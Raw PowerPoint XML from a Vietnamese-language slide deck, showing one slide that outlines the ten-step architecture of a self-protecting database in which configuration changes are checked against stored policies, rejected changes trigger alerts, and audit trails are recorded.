            <a:off x="7699956" y="9792750"/>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8</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">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77366893"/>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57633644-05AE-F758-5715-8FCC2B0243B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="2524187"/>
            <a:ext cx="16802100" cy="7442430"/>
            <a:chOff x="40798" y="25661"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70556116-A017-23AC-3C61-83D667F0A3F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="40798" y="2566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ED1BA458-8772-2DBE-E547-07AED6D4D06E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="71151"/>
              <a:ext cx="1950879" cy="263551"/>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latin typeface="+mj-lt"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="32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a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Malgun Gothic" panose="020B0503020000020004" pitchFamily="34" charset="-127"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAC0BB1E-3517-3A12-40A8-E5521D4A8767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11030026" y="3039184"/>
            <a:ext cx="5878168" cy="5579280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7CE1E80-53DB-2DC7-4FA4-36EB9B723619}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11331606" y="8508786"/>
            <a:ext cx="5576587" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kiến trúc của cơ sở dữ liệu tự bảo vệ [11]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D23794C-577C-A672-C992-32CB18122B38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7918603" y="9607923"/>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9</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68460DD8-94BC-320E-4CA8-FD1F9839F9D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906780" y="3420309"/>
            <a:ext cx="10020299" cy="5632311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>- (Bước 1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ây dựng các chính sách để hỗ trợ các mục tiêu nhất định. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Các chính sách này được lưu trữ trong cùng một cơ sở dữ liệu đang được bảo vệ (cơ sở dữ liệu tar-get) và được sử dụng để xác minh các yêu cầu (hoặc nỗ lực) thay đổi cấu hình cơ sở dữ liệu và thực thi các nhiệm vụ chính trị. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>- (Bước 2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Khi tin tặc bắt đầu nỗ lực thay đổi cấu hình bảo mật.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>- (Bước 3 &amp;; 4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Thực hiện quá trình xác minh trước khi có thể được xử lý. Bước này được thực hiện bởi các thủ tục lưu trữ cơ sở dữ liệu có logic tích hợp để</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>- (Bước 5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kiểm tra yêu cầu đối với các chính sách. Nếu yêu cầu tuân thủ các chính sách, thì yêu cầu sẽ được áp dụng.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Sau đó, các bảng/dạng xem hệ thống cơ sở dữ liệu được cập nhật để phản ánh sự thay đổi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(bước 6) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>và biên bản kiểm tra được ghi lại </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(bước 7). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>- (Bước 8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nếu không, nhiệm vụ lại sẽ bị từ chối và chủ sở hữu hệ thống được cảnh báo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>- (Bước 9) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Người dùng được thông báo </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>- (Bước 10) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ấu vết kiểm tra được ghi lại</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1600637843"/>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1396</TotalTime>
  <Words>2156</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>130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Times New Roman</vt:lpstr>
      <vt:lpstr>Aptos</vt:lpstr>
      <vt:lpstr>Crimson Pro</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Cabin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Trắng Mô đun Trừu tượng Bản trình bày chiến lược Bản thuyết trình Kinh doanh</dc:title>
  <dc:creator>CHÂU CÔNG THOẠI</dc:creator>
  <cp:lastModifiedBy>Nguyễn Thành Phát</cp:lastModifiedBy>
  <cp:revision>44</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-01T01:15:58Z</dcterms:modified>
  <dc:identifier>DAF9M7sjAYk</dc:identifier>
</cp:coreProperties>
</file>